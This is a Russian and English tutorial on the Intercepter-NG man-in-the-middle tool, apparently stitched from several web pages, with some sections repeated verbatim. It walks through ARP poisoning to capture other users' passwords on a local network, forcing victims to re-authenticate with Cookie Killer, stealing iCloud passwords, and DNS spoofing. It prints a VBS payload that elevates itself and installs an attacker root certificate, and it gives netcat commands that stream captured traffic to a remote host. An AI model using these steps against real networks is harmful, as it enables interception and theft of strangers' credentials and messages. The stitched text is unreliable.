Intercepter

Обнуление куки для провоцирования ввода логина и пароля

Куки могут со временем быть обновлены, и мы не сможем вновь зайти со старыми куки на сайт. Поэтому нам хотелось бы получить логин и пароль. Но пока куки действуют, пользователю не нужно вводить учётные данные каждый раз, поэтому хотя «жертва» и заходит на сайт, мы не можем их перехватить.

Чтобы не ждать, пока истечёт срок действия куки и на целевом компьютере понадобиться ввести учётные данные, мы можем ускорить этот процесс – обнулить куки. Для этого имеется специальная опция: Cookie Killer.

Cookie Killer — обнуляет кукиз, тем самым принуждая пользователя повторно авторизоваться — ввести логин и пароль, чтобы атакующий мог их перехватить. Функция Cookie Killer работает и для SSL соединений. Имеются черные (misc\ssl_bl.txt) и белые списки (misc\ssl_wl.txt). В них можно исключить или напротив жестко указать IP адреса или домены, к которым следует или не следует применять SSL MiTM. При указании extra ssl port нет необходимости указывать тип read\write, достаточно указать номер порта. Весь трафик пишется в ssl_log.txt.

О том, как воспользоваться этой опцией, показано в этом видео:

Примечание: во время тестирования мне не удалось заставить работать Cookie Killer, ни в виртуальной машине, ни с отдельным реальным компьютером.

Дополнительную информацию о различных атаках вы найдёте в видео:

Внедрение HTTP:

Принудительная загрузка файлов:

Код упоминаемого в видео .vbs файла:

Dim str

str = "-----BEGIN CERTIFICATE-----MIICFzCCAYACCQCEGK7JTRLonzANBgkqhkiG9w0BAQUFADBQMQswCQYDVQQGEwJVUzEOMAwGA1UECBMFVGV4YXMxDjAMBgNVBAcTBVRleGFzMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwHhcNMTMwNDAzMTE1OTUzWhcNMjEwNjIwMTE1OTUzWjBQMQswCQYDVQQGEwJVUzEOMAwGA1UECBMFVGV4YXMxDjAMBgNVBAcTBVRleGFzMSEwHwYDVQQKExhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAKM+co6MfVJQCrnW1CAMEnPYgbthTZk7hyXf5Qd4ZYJOrQUtF959bjOleDEyy/swA1qezLtH+w9v/Jnmnufd0Ui78ZWMvjlKk3nlagCzSK/1qa/wVtJTFbnr+k1i1GQuMCadYujEDy6MC7IGtiefpjr3JmpMwIlKyTRMmYwsWZ0rAgMBAAEwDQYJKoZIhvcNAQEFBQADgYEARVtNikEQ0Oiy7hw/Y/tysM/IQl6a0XDxcuTxT8o6WJD42KwKTzbgcSQQggp4LXwFNrw2BC9ISiinxXYuBuPMATTrs5LrCeGcogYJFOhUd0YcG/0qjgy60IoFeexWc7iyqpNAG+AQcG0HlXfNan9U1jFyb/YCQuo9gpgl4EVyjr0=-----END CERTIFICATE-----"

Set objFSO=CreateObject("Scripting.FileSystemObject")


outFile="1.crt"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write str
objFile.Close
Set WshShell = WScript.CreateObject("WScript.Shell")
  If WScript.Arguments.length = 0 Then
  Set ObjShell = CreateObject("Shell.Application")
  ObjShell.ShellExecute "wscript.exe", """" & _
  WScript.ScriptFullName & """" &_
  " RunAsAdministrator", , "runas", 1
  End if

Dim objShell
Set objShell = WScript.CreateObject ("WScript.shell")
objShell.run "certutil -addstore -f Root 1.crt"
Set objShell = Nothing

Если вам нужен только сам сертификат, то вы его найдёте в папке программы Intercepter-NG, файл misc\server.crt

Функция X-Scan:

FATE (фальшивые обновления и фальшивый веб-сайт):

Получение пароля от iCloud при помощи Intercepter-NG:

Ещё инструкции по Intercepter-NG

  • Описание большинства опций Intercepter-NG вы найдёте на странице: https://kali.tools/?p=3101

Далее даётся техническое описание ARP спуфинга.

eXtreme

The typical workflow for the sniffer is analyzing pre-defined ports, associated with specified protocols.
If we say http, we mean 80 port (or 8080 or whatever defined in the ports list associated with http protocol).
Thus only these ports will be analyzed.
If some application uses different port, for example 1234, then the sniffer will not analyze packets that go
through it.
In eXtreme mode Intercepter will analyze all TCP packets without checking ports. So, even if some application uses
undefined port, the sniffer will check those packets anyway.

Though it slows down the performance (it’s necessary to check much more packets than usually) and it may detect
wrong data or miss the right protocol (for example FTP
and POP3
use the same authorization style)
it gives an ability to find and intercept interesting data on undefined ports.
Use it at your own risk, don’t be surprized if something goes wrong while the eXtreme mode is turned on.

Установка Intercepter-NG в Ubuntu и Linux Mint

Если у вас ещё не установлен Wine, то установите его:

sudo dpkg --add-architecture i386
sudo apt update
sudo apt install wine32
wine --config

Далее мы устанавливаем дополнительные пакеты и файлы:

wget https://github.com/intercepter-ng/mirror/blob/master/wine_pcap_dlls.tar.gz?raw=true -O wine_pcap_dlls.tar.gz
sudo apt install libpcap-dev
sudo apt install tcpdump:i386
tar xvzf wine_pcap_dlls.tar.gz
sudo cp wpcap/wpcap.dll.so /usr/lib/i386-linux-gnu/wine
sudo cp packet/packet.dll.so /usr/lib/i386-linux-gnu/wine
rm -rf wine_pcap_dlls.tar.gz wpcap/ packet/
sudo apt install winetricks
winetricks cc580

Обратите внимание на имя сетевого интерфейса, здесь это enp0s3, в отличии, например, от Kali Linux, где сетевой интерфейс называется eth0:

sudo ethtool --offload enp0s3 rx off tx off

Теперь нам нужно скачать и запустить Intercepter-NG. Но дело в том, что в Ubuntu и Linux Mint по умолчанию мы работаем под обычным пользователем. А Intercepter-NG требует повышенных привилегий. Но если мы воспользуемся sudo, то уже Wine нам напишет, что папка (префикс) не принадлежит нам, т.е. будет выведено что-то вроде:

wine: /home/mial/.wine is not owned by you

Поэтому нам нужно зайти под суперпользователем. Но в Ubuntu и Linux Mint суперпользователь по умолчанию не имеет пароля, т.е. невозможно выполнить вход под ним. Поэтому мы начинаем с того, что устанавливаем пароль для суперпользователя:

sudo passwd

Вам нужно будет:

  • ввести пароль для текущего пользователя (поскольку мы используем sudo)
  • придумать и ввести пароль для суперпользователя
  • повторите пароль для суперпользователя

Теперь мы входим под суперпользователем:

su -

Создадим каталог, куда мы будем устанавливать Intercepter-NG, перейдём в эту директорию:

mkdir Intercepter-NG
cd Intercepter-NG/

Скачиваем и подготавливаем Intercepter-NG:

wget https://github.com/intercepter-ng/mirror/blob/master/Intercepter-NG.v1.0.zip?raw=true -O Intercepter-NG.zip
unzip Intercepter-NG.zip
rm wpcap.dll
rm Packet.dll

Запускаем Intercepter-NG:

wine Intercepter-NG.exe

В Linux Mint установка и запуск Intercepter-NG выполняется как и в Ubuntu. Но если при установке Wine, которая выполняется командой:

sudo apt install wine32

Вы получаете ошибку, что пакет wine32 не найден, то вместо этой команды выполните следующую:

sudo apt install wine:i386

Остальной процесс установки проходит без изменений.

Установка Intercepter-NG в BlackArch и Arch Linux

Нужно начать с установки Wine. Подробности вы можете найти в статье «Как установить Wine в Arch Linux/BlackArch. Что такое и как подключить репозиторий Multilib». Здесь краткая инструкция, что нужно сделать для установки Wine в BlackArch и другие производные Arch Linux.

Чтобы включить multilib, откройте текстовый файл /etc/pacman.conf:

sudo gedit /etc/pacman.conf

В нём найдите и раскомментируйте строки (убедитесь, что раскомментировали обе строки, иначе изменения не вступят в силу):

 
Include = /etc/pacman.d/mirrorlist

Обновите информацию о пакетах:

sudo pacman -Sy

Установите Wine:

sudo pacman -S wine wine_gecko wine-mono lib32-mpg123 lib32-gnutls

Теперь, когда у вас уже установлен Wine, выполняем следующие действия. 

Создадим каталог, куда мы будем устанавливать Intercepter-NG, перейдём в эту директорию:

mkdir Intercepter-NG
cd Intercepter-NG/

Далее:

wget https://github.com/intercepter-ng/mirror/blob/master/wine_pcap_dlls.tar.gz?raw=true -O wine_pcap_dlls.tar.gz
sudo pacman -S lib32-libpcap tcpdump winetricks
tar xvzf wine_pcap_dlls.tar.gz
sudo cp wpcap/wpcap.dll.so /usr/lib32/wine/
sudo cp packet/packet.dll.so /usr/lib32/wine/
rm -rf wine_pcap_dlls.tar.gz wpcap/ packet/
sudo winetricks cc580
sudo ethtool --offload enp0s3 rx off tx off

Загружаем Intercepter-NG v1.0 и удаляем dll файлы wpcap.dll и Packet.dll:

wget https://github.com/intercepter-ng/mirror/blob/master/Intercepter-NG.v1.0.zip?raw=true -O Intercepter-NG.zip
unzip Intercepter-NG.zip
rm wpcap.dll
rm Packet.dll

Фикс для Arch Linux (BlackArch):

sudo ln -s /usr/lib32/libpcap.so /usr/lib32/libpcap.so.0.8

Запуск Intercepter-NG в Arch Linux (BlackArch):

sudo wine Intercepter-NG.exe

PCAP Over IP

You dont need rpcapd any more to capture traffic from remote pc. Almost all of unix OSes
has tcpdump and netcat. The idea of this method is to launch capturing process on the host and
redirect the stream to remote host via netcat. So Intercepter is going to be a port listener taking incoming connection.
Few examples of how you can perform transfer of packets via tcp channel.
#cat log.cap | nc IP PORT
#tcpdump -i face -w — not port PORT| nc IP PORT
#dumpcap -i face -P -w — | nc IP PORT
IP and PORT are the values where Intercepter runned.
-P option of dumpcap is to send packets in original libpcap format, not pcapng.

Атака человек-посередине в Intercepter-NG

Начнём с обычной атаки человек-посередине (атака посредника).

Сделаем небольшие настройки. В зависимости от того, подключены вы по Wi-Fi или по Ethernet (проводу), кликая на выделенную иконку перейдите в нужный режим (если соединены по проводу – выберите изображение сетевой карты, если по беспроводной сети, то выберите изображение с уровнем сигнала):

Также откройте выпадающий список сетевых адаптеров (Network Adapter). У меня всё работает, когда я выбираю вариант со своим IP адресом (т.е. ‘Microsoft’ on local host: 192.168.0.244):

Кликните правой кнопкой по пустой таблице и выберите Smart Scan:

Будет отображён список целей:

Добавьте нужные в качестве целей (Add as Target):

Для начала сниффинга нажмите соответствующую иконку:

Перейдите на вкладку MiTM mode (это глобус с патч-кордами) и нажмите иконку ARP Poison (символ радиационной опасности):

Во вкладке Password Mode (символ — связка ключей), будут появляться захваченные учётные данные:

На вкладке Resurrection (кнопка с птицей Феникс) вы можете видеть, какие файлы были переданы:

Была рассмотрена базовая атака, позволяющая:

  • перехватывать логины и пароли;
  • видеть, какие сайты посещает пользователь и какие файлы скачивает.

Базовая атака включает в себя сканирование локальной сети, выбор целей, запуск сниффинга и запуск ARP-травления. С этих действий начинается и ряд других, более сложных атак.

What can Intercepter-NG

The main task of Intercepter-NG is to perform a man-in-the-middle attack. In a practical sense, the man-in-the-middle attack (it is also called the mediator’s attack) consists in the ability to view the data transmitted by other users on the local network. Among these data can be logins and passwords from web sites. The transmitted data can be analyzed and saved, and also modified on the fly.

To describe the technical essence of this attack, imagine a local network. Such a local network can be several computers in your apartment that are connected to a router. It does not matter whether they are connected by wire or by Wi-Fi. The router receives requests from computers, redirects them, for example, to the Internet, and the received answers are returned back to the computers that sent the requests. In this situation, the router is the gateway.

Due to the attack, called ARP spoofing, the computer starts to consider the gateway not the router, but the attacker’s computer. The attacker receives requests from the ‘victim’ and sends them to the destination (for example, requests the contents of the website on the Internet), receiving a response from the destination, he sends it to the ‘victim’. In this situation, the attacker becomes an intermediary. Intercepter-NG implements the ARP attack and performs it automatically.

The attacker gains access to the data being transmitted and can, for example, retrieve passwords and messages from this data. The process of analyzing transmitted data is called sniffing. In the process of sniffing, Intercepter-NG can:

  • Intercept logins and passwords to log on to websites
  • Recover transferred data (files)
  • Intercept messages from some instant messengers
  • See addresses visited by a user

In addition to data transfer, it is possible to change them, insert JavaScript into the code of the opened pages, and force the user to download a file.

All this works fine only for unencrypted data. If the data is encrypted (HTTPS), then they can not be analyzed without additional actions.

Before connecting to the website, computers query a DNS server (name server) to find out an IP address of the requested host. Intercepter-NG is able to change DNS replies (DNS spoofing), which allows you to redirect a ‘victim’ to fake clones of web sites for subsequent attacks.

This is not all the features of the program. We will get acquainted with other possibilities later in this manual.

Что такое Intercepter-NG

Intercepter-NG – это программа для выполнения атак человек-посередине. Имеется большое количество программ для таких атак, главной особенностью, выделяющей Intercepter-NG среди остальных, является то, что программа изначально была написана для Windows и прекрасно работает именно в этой операционной системе. Также к особенностям программы можно отнести графический интерфейс, в котором собраны многочисленные функции и опции, связанные с атакой человек-посередине, а также с некоторыми другими задачами пентестинга.

Благодаря графическому интерфейсу, использовать Intercepter-NG легко. Но большое количество опций и фрагментированная документация могут запутать начинающего пользователя. Надеюсь, что эта инструкция заполнит пробел. Это руководство написано для самых начинающих пользователей, возможно, даже не имеющих опыта работы с аналогичными утилитами в Linux.

Как пользоваться Intercepter-NG

Сам процесс мониторинга и дальнейшие действия после него описывать не будем – тут действует правило: один раз открыл и сам протестировал. Основные рабочие команды: Stealth ip, SSL Strip и Mitm (связаны с атаками), опции Resurrection для перехвата HTTPS и Cookie Killer (ищем в параметрах).

Пару слов об интерфейсе утилиты – он минималистичен и лаконичен, хотя реализован на английском языке. Вкладок немного, они помечены значками. Вся информация выводится в главном окне в табличном формате.

Подобные инструменты несомненно интересны пользователям по всему миру – они многозадачны и комфорты в использовании. Немного знаний и навыков – и вам будет под силу даже взлом паролей.

Если заинтересовались, скачать Intercepter-NG бесплатно на ПК можно на нашем веб-портале — переходите по прямой ссылке внизу (доступна последняя версия).

Установка Intercepter-NG в Kali Linux

Если у вас ещё не установлен Wine, то установите его:

dpkg --add-architecture i386
apt update
apt install wine32
wine --config

Далее:

wget https://github.com/intercepter-ng/mirror/blob/master/wine_pcap_dlls.tar.gz?raw=true -O wine_pcap_dlls.tar.gz
apt install libpcap-dev
apt install tcpdump:i386
tar xvzf wine_pcap_dlls.tar.gz
cp wpcap/wpcap.dll.so /usr/lib/i386-linux-gnu/wine
cp packet/packet.dll.so /usr/lib/i386-linux-gnu/wine
rm -rf wine_pcap_dlls.tar.gz wpcap/ packet/
apt install winetricks
winetricks cc580
ethtool --offload eth0 rx off tx off

Создадим каталог, куда мы будем устанавливать Intercepter-NG, перейдём в эту директорию:

mkdir Intercepter-NG
cd Intercepter-NG/

Загружаем Intercepter-NG v1.0 и удаляем dll файлы wpcap.dll и Packet.dll:

wget https://github.com/intercepter-ng/mirror/blob/master/Intercepter-NG.v1.0.zip?raw=true -O Intercepter-NG.zip
unzip Intercepter-NG.zip
rm wpcap.dll
rm Packet.dll

Запуск:

wine Intercepter-NG.exe

Where to download Intercepter-NG

The official site of the Intercepter-NG program is sniff.su. There you can download it. But some browsers mark the site as containing unwanted software. Of course, this does not prevent you from visiting the site, but if you do not want to press a few extra buttons, then another official site where you can download Intercepter-NG is the mirror on GitHab: https://github.com/intercepter-ng/mirror. There are all versions of the program:

  • file with the .apk extension is a version for Android (requires root privileges)
  • with CE letters is console version
  • Intercepter-NG.v*.zip is the main version for Windows

The downloaded program does not need to be installed — just unpack the archive.

Особенности

  • Root-доступ. На устройстве должны быть рут-права, чтобы пользоваться всем функционалом приложения.
  • Возможность узнать IP и MAC-адрес любого пользователя, который пользуется той же точкой доступа, что и вы.
  • Возможность перехватывать куки-файлы для чтения переписок, действия с аккаунтами.
  • Возможность перехватывать исходящий и входящий трафик, подменять файлы.

Минималистичный интерфейс и стабильная работа – еще пара особенностей приложения, которые делают его популярным в узких кругах.

Далее Вы можете скачать на Андроид обычную версию приложения Intercepter-NG совершенно бесплатно!

На помощь приходит Cookie Killer, который исправно работает, например, на приложении Facebook. Есть на iOS и свой святой грааль — iCloud, но обнуление cookie не поможет сбросить его сессию. Именно для iCloud, а так же Instagram и VK, была добавлена функция iOS Killer, которая сбрасывает сессии указанных приложений и позволяет перехватить повторную авторизацию. Такой фокус нельзя проделать с AppStore, т.к. Там, по всей видимости, используется SSL Pinning. Данный вектор опробован на IOS 5 6 и 8.4.

Метки:. Добавить метки Пометьте публикацию своими метками Метки лучше разделять запятой. Например: программирование, алгоритмы. Ну, попадаются отдельные индивиды.

Адекватные люди четко различают когда это этичный хакинг и пентест, а когда это что-то не совсем легальное) Но, о втором, как правило, не распространяются. Инструменты собираются из собственноручно патченных утилит, в паблик не выкладываются.

The man-in-the-middle attack with Intercepter-NG

Let us start with a normal man-in-the-middle attack.

Let us make small adjustments. Depending on whether you are connected via Wi-Fi or Ethernet (wire), set the desired mode by clicking on the highlighted icon (if connected by wire — select the network card image, if over the wireless network, then select the image with the signal level):

Also open the drop-down list of network adapters (Network Adapter). It works for me when I choose the option with my IP address (i.e. ‘Microsoft’ on local host: 192.168.0.244):

Right-click on the empty table and select Smart Scan:

A list of targets will be displayed:

Add what you want to attack (Add as Target):

To start sniffing, click the corresponding icon:

Click the MiTM mode tab (this is a globe with patch cords) and click the ARP Poison icon (the symbol of radiation hazard):

In the Password Mode tab (a symbol is a bunch of keys), captured credentials will appear:

On the Resurrection tab (the button with the Phoenix bird) you can see which files were transferred:

We considered a basic attack, which allows to:

  • intercept logins and passwords;
  • see which sites the user visits and what files they download.

A basic attack involves scanning the local network, selecting targets, launching sniffing, and starting ARP spoofing. With these actions, a number of other, more complex attacks begin.

Почему возможна атака ARP-spoofing

Каждое устройство, подключённое к сети, имеет MAC-адрес. Этот адрес присвоен любому сетевому оборудованию (сетевые карты, Wi-Fi адаптеры). Роутеры, телефоны и любые другие устройства, подключающиеся к сети, также имеют MAC-адрес, поскольку имеют встроенные сетевые карты. MAC-адрес состоит из шести пар символов, разделённых двоеточием или тире. В используемых символах присутствуют все цифры и латинские буквы от a до f. Пример MAC-адреса: 52:54:00:a6:db:99. Для подключения двух устройств, например, вашего компьютера к шлюзу, нужно знать не только IP адрес, но и MAC-адрес. Для определения MAC-адреса шлюза используется ARP (англ. Address Resolution Protocol – протокол определения адреса) – протокол в компьютерных сетях, предназначенный для определения MAC-адреса по известному IP-адресу. IP-адрес роутера (шлюз по умолчанию), известен или получается по DHCP.

Рассмотрим суть функционирования ARP на простом примере. Компьютер А (IP-адрес 10.0.0.1) и компьютер Б (IP-адрес 10.22.22.2) соединены сетью Ethernet. Компьютер А желает переслать пакет данных на компьютер Б, IP-адрес компьютера Б ему известен. Однако сеть Ethernet, которой они соединены, не работает с IP-адресами. Поэтому компьютеру А для осуществления передачи через Ethernet требуется узнать адрес компьютера Б в сети Ethernet (MAC-адрес в терминах Ethernet). Для этой задачи и используется протокол ARP. По этому протоколу компьютер А отправляет широковещательный запрос, адресованный всем компьютерам в одном с ним широковещательном домене. Суть запроса: «компьютер с IP-адресом 10.22.22.2, сообщите свой MAC-адрес компьютеру с МАС-адресом (напр. a0:ea:d1:11:f1:01)». Сеть Ethernet доставляет этот запрос всем устройствам в том же сегменте Ethernet, в том числе и компьютеру Б. Компьютер Б отвечает компьютеру А на запрос и сообщает свой MAC-адрес (напр. 00:ea:d1:11:f1:11) Теперь, получив MAC-адрес компьютера Б, компьютер А может передавать ему любые данные через сеть Ethernet.

Чтобы не было необходимости перед каждой отправкой данных задействовать протокол ARP, полученные MAC-адреса и соответствующие им IP адреса записываются в таблице на некоторое время. Если нужно отправить данные на тот же IP, то нет необходимости каждый раз опрашивать устройства в поисках нужного MAC.

Как мы только что увидели, ARP включает в себя запрос и ответ. MAC-адрес из ответа записывается в таблицу MAC/IP. При получении ответа он никак не проверяется на подлинность. Более того, даже не проверяется, был ли сделан запрос. Т.е. на целевые устройства можно прислать сразу ARP-ответ (даже без запроса), с подменёнными данными, и эти данные попадут в таблицу MAC/IP и они будут использоваться для передачи данных. Это и есть суть атаки ARP-spoofing, которую иногда называют ARP травлением, травлением ARP кэша.

Обнуление куки для провоцирования ввода логина и пароля

Куки могут со временем быть обновлены, и мы не сможем вновь зайти со старыми куки на сайт. Поэтому нам хотелось бы получить логин и пароль. Но пока куки действуют, пользователю не нужно вводить учётные данные каждый раз, поэтому хотя «жертва» и заходит на сайт, мы не можем их перехватить.

Чтобы не ждать, пока истечёт срок действия куки и на целевом компьютере понадобиться ввести учётные данные, мы можем ускорить этот процесс – обнулить куки. Для этого имеется специальная опция: Cookie Killer.

Cookie Killer — обнуляет кукиз, тем самым принуждая пользователя повторно авторизоваться — ввести логин и пароль, чтобы атакующий мог их перехватить. Функция Cookie Killer работает и для SSL соединений. Имеются черные (miscssl_bl.txt) и белые списки (miscssl_wl.txt). В них можно исключить или напротив жестко указать IP адреса или домены, к которым следует или не следует применять SSL MiTM. При указании extra ssl port нет необходимости указывать тип readwrite, достаточно указать номер порта. Весь трафик пишется в ssl_log.txt.

О том, как воспользоваться этой опцией, показано в этом видео:

Примечание: во время тестирования мне не удалось заставить работать Cookie Killer, ни в виртуальной машине, ни с отдельным реальным компьютером.

Дополнительную информацию о различных атаках вы найдёте в видео:

Внедрение HTTP:

Принудительная загрузка файлов:

Код упоминаемого в видео .vbs файла:

Если вам нужен только сам сертификат, то вы его найдёте в папке программы Intercepter-NG, файл miscserver.crt

Функция X-Scan:

FATE (фальшивые обновления и фальшивый веб-сайт):

Получение пароля от iCloud при помощи Intercepter-NG:

Ещё инструкции по Intercepter-NG

NAT

Translates ICMP\UDP\TCP packets from Ethernet to Ethernet areas.
Long outgoing packets (up to MTU size) are fragmented and MSS tracking is performed.FTP
Active mode is also available.

Etnernet <> Ethernet
In the ‘External interface’ choose network card that is connected to the external network.
In the ‘Internal’ choose the device connected to the local area you are going to translate.
Enter IP address of the default gateway from your external interface into the ‘Router’s IP’ field.
Enter IP addresses of the local area’s clients into the ‘Client’s IP’ field.

Each 3 minutes ‘old’ entries are removed.
‘Promisc’ flag controls the mode of opening ethernet interfaces.
In case of Wi-Fi cards you may unmark the flag if promiscuous mode is not supported by the card.
FTP‘ flag controls translation of
FTP
Active mode.

There is an option to enable pure IP Forward mode. No MiTMs available in this mode, but it allows to
start arp poisoning in situation when you can not use Stealth IP.
It is usually necessary when the gateway have a white list of legit computers in the network
so NAT can not work correctly.

Почему возможна атака ARP-spoofing

Каждое устройство, подключённое к сети, имеет MAC-адрес. Этот адрес присвоен любому сетевому оборудованию (сетевые карты, Wi-Fi адаптеры). Роутеры, телефоны и любые другие устройства, подключающиеся к сети, также имеют MAC-адрес, поскольку имеют встроенные сетевые карты. MAC-адрес состоит из шести пар символов, разделённых двоеточием или тире. В используемых символах присутствуют все цифры и латинские буквы от a до f. Пример MAC-адреса: 52:54:00:a6:db:99. Для подключения двух устройств, например, вашего компьютера к шлюзу, нужно знать не только IP адрес, но и MAC-адрес. Для определения MAC-адреса шлюза используется ARP (англ. Address Resolution Protocol – протокол определения адреса) – протокол в компьютерных сетях, предназначенный для определения MAC-адреса по известному IP-адресу.  IP-адрес роутера (шлюз по умолчанию), известен или получается по DHCP.

Рассмотрим суть функционирования ARP на простом примере. Компьютер А (IP-адрес 10.0.0.1) и компьютер Б (IP-адрес 10.22.22.2) соединены сетью Ethernet. Компьютер А желает переслать пакет данных на компьютер Б, IP-адрес компьютера Б ему известен. Однако сеть Ethernet, которой они соединены, не работает с IP-адресами. Поэтому компьютеру А для осуществления передачи через Ethernet требуется узнать адрес компьютера Б в сети Ethernet (MAC-адрес в терминах Ethernet). Для этой задачи и используется протокол ARP. По этому протоколу компьютер А отправляет широковещательный запрос, адресованный всем компьютерам в одном с ним широковещательном домене. Суть запроса: «компьютер с IP-адресом 10.22.22.2, сообщите свой MAC-адрес компьютеру с МАС-адресом (напр. a0:ea:d1:11:f1:01)». Сеть Ethernet доставляет этот запрос всем устройствам в том же сегменте Ethernet, в том числе и компьютеру Б. Компьютер Б отвечает компьютеру А на запрос и сообщает свой MAC-адрес (напр. 00:ea:d1:11:f1:11) Теперь, получив MAC-адрес компьютера Б, компьютер А может передавать ему любые данные через сеть Ethernet.

Чтобы не было необходимости перед каждой отправкой данных задействовать протокол ARP, полученные MAC-адреса и соответствующие им IP адреса записываются в таблице на некоторое время. Если нужно отправить данные на тот же IP, то нет необходимости каждый раз опрашивать устройства в поисках нужного MAC.

Как мы только что увидели, ARP включает в себя запрос и ответ. MAC-адрес из ответа записывается в таблицу MAC/IP. При получении ответа он никак не проверяется на подлинность. Более того, даже не проверяется, был ли сделан запрос. Т.е. на целевые устройства можно прислать сразу ARP-ответ (даже без запроса), с подменёнными данными, и эти данные попадут в таблицу MAC/IP и они будут использоваться для передачи данных. Это и есть суть атаки ARP-spoofing, которую иногда называют ARP травлением, травлением ARP кэша.

Где скачать Intercepter-NG

Официальным сайтом программы Intercepter-NG является sniff.su. Там же её можно скачать. Но некоторые браузеры помечают сайт как содержащий нежелательное ПО. Конечно, это не препятствует посещению сайта, но если вам не хочется нажимать несколько лишних кнопок, то ещё одни официальным сайтом, где можно скачать Intercepter-NG, является зеркало на Гитхабе: https://github.com/intercepter-ng/mirror. Там имеются все версии программы:

  • файл с расширением .apk – это версия для Android (требует root прав)
  • с буквами CE – консольная версия
  • Intercepter-NG.v*.zip – основная версия для Windows

Скаченная программа не нуждается в установке – достаточно распаковать архив.

Описание атаки ARP-spoofing

Два компьютера(узла) M и N в локальной сети Ethernet обмениваются сообщениями. Злоумышленник X, находящийся в этой же сети, хочет перехватывать сообщения между этими узлами. До применения атаки ARP-spoofing на сетевом интерфейсе узла M ARP-таблица содержит IP и MAC адрес узла N. Также на сетевом интерфейсе узла N ARP-таблица содержит IP и MAC узла M.

Во время атаки ARP-spoofing узел X (злоумышленник) отсылает два ARP ответа (без запроса) – узлу M и узлу N. ARP-ответ узлу M содержит IP-адрес N и MAC-адрес X. ARP-ответ узлу N содержит IP адрес M и MAC-адрес X.

Так как компьютеры M и N  поддерживают самопроизвольный ARP, то, после получения ARP-ответа, они изменяют свои ARP таблицы, и теперь ARP-таблица M содержит MAC адрес X, привязанный к IP-адресу N, а ARP-таблица N содержит MAC адрес X, привязанный к IP-адресу M.

Тем самым атака ARP-spoofing выполнена, и теперь все пакеты(кадры) между M и N проходят через X. К примеру, если M хочет передать пакет компьютеру N, то M смотрит в свою ARP-таблицу, находит запись с IP-адресом узла N, выбирает оттуда MAC-адрес (а там уже MAC-адрес узла X) и передает пакет. Пакет поступает на интерфейс X, анализируется им, после чего перенаправляется узлу N.

Что может Intercepter-NG

Главная задача Intercepter-NG – выполнение атаки человек-посередине. В практическом смысле, атака человек-посередине (её ещё называют атакой посредника) заключается в возможности просматривать передаваемые другими пользователями данные в локальной сети. Среди этих данных могут быть логины и пароли от сайтов. Также передаваемые данные можно не только анализировать и сохранять, но и изменять.

Чтобы описать техническую суть этой атаки, представьте себе локальную сеть. Такой локальной сетью могут быть несколько компьютеров в вашей квартире, которые подключены к роутеру

При этом неважно, подключены они по проводу или по Wi-Fi. Роутер получает запросы от компьютеров, перенаправляет их, например, в Интернет, а полученные ответы возвращает обратно компьютерам, отправившим запросы

В данной ситуации роутер является шлюзом.

Благодаря атаке, называемой ARP спуфингом, компьютер начинает считать шлюзом не роутер, а компьютер атакующего. Атакующий получает запросы от «жертвы» и передаёт их в пункт назначения (например, запрашивает содержимое веб-сайта в Интернете), получив ответ от пункта назначения, он направляет его «жертве». В этой ситуации атакующий становится посредником – отсюда другое название атаки человек-посередине – «атака посредника». Для реализации атаки ARP спуфинг необязательно понимать её детали. Но если вам интересно, почему это происходит, то в конце инструкции вы найдёте подробное описание этого процесса.

Атакующий получает доступ к передаваемым данным и может, например, извлекать из этих данных пароли и сообщения. Процесс анализа передаваемых данных называется сниффингом. В процессе сниффинга Intercepter-NG умеет:

  • Перехватывать логины и пароли для входа на веб-сайты
  • Восстанавливать переданные данные (файлы)
  • Перехватывать сообщения некоторых мессенджеров
  • Показывать посещённые пользователем адреса

Кроме передачи данных, возможно их изменение, внедрение в код открываемых страниц JavaScript и принудительная загрузка пользователю файла.

Всё это прекрасно работает только для незашифрованных данных. Если данные зашифрованы (HTTPS), то их невозможно проанализировать без дополнительных действий.

Прежде чем подключиться к веб-сайту, компьютер обращается к DNS (серверу имён), чтобы узнать его IP адрес. Intercepter-NG умеет подменять ответы DNS (делать DNS спуфинг), что позволяет перенаправлять «жертву» на фальшивые копии сайтов для последующих атак.

Это далеко не все возможности программы. С другими возможностями мы познакомимся далее в этой инструкции.